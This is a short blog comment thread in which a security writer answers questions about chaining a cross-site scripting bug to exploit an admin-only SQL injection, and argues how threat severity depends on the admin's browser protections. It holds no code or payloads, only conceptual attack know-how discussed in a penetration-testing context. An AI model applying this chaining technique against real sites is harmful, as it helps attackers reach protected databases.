Blog Comments

  1. amolnaik4's Avatar
    Quote Originally Posted by [s]


    Most probably threat level is low : ) Thanks Bro...
    In same sense, all XSSes on IE will have a threat level as low. But that will not be the case. Threat Severity will be always depend on other points as well such as ease of exploitation, exploit availability, knowledge required to exploit, etc.

    So you can only say it's low level only when you know admin only uses browser having anti-XSS protections (filters, addons, extenstions, etc). Single instance of using other browser makes it High.

    AMol NAik
  2. [s]'s Avatar

    f that's the case, then u need to find the 0-day in that or decrease the threat level.
    Most probably threat level is low : ) Thanks Bro...
  3. amolnaik4's Avatar
    Quote Originally Posted by [s]
    This way is really a innovative, I have question.
    1) How we know Table name ,Column name. If it is public CMS and vuln to SQL then possible to do easily.
    2) What about IE , they have anti-XSS
    Here are the answers:
    1) At the moment of writing this post, I assumed that SQL injection vulnerability in CMS is already public. So you can use that to know the database details to fetch the data.

    The other scenario I can think of is in case of grey-box audit. Suppose you audited the admin portal and found that it is vulnerble to SQLi, you reported issue and client says it's should be low/medium as only admin has access to the vulnerble page. Again client has extra mitigations such as there is only 1 admin which is trusted & has IP address level access to admin portal. So now in this case, if you have a xss bug in main site, you can demonstrate using this technique that still the authenticated sqli can be exploited.

    2. Those are browser protections and part of browser security eventually user security. To successfully conduct this attack the admin should be using browser not having plugins such as anti-XSS, NoScript, etc. If that's the case, then u need to find the 0-day in that or decrease the threat level.

    That's my thoughts.

    AMol NAik
  4. [s]'s Avatar
    This way is really a innovative, I have question.
    1) How we know Table name ,Column name. If it is public CMS and vuln to SQL then possible to do easily.
    2) What about IE , they have anti-XSS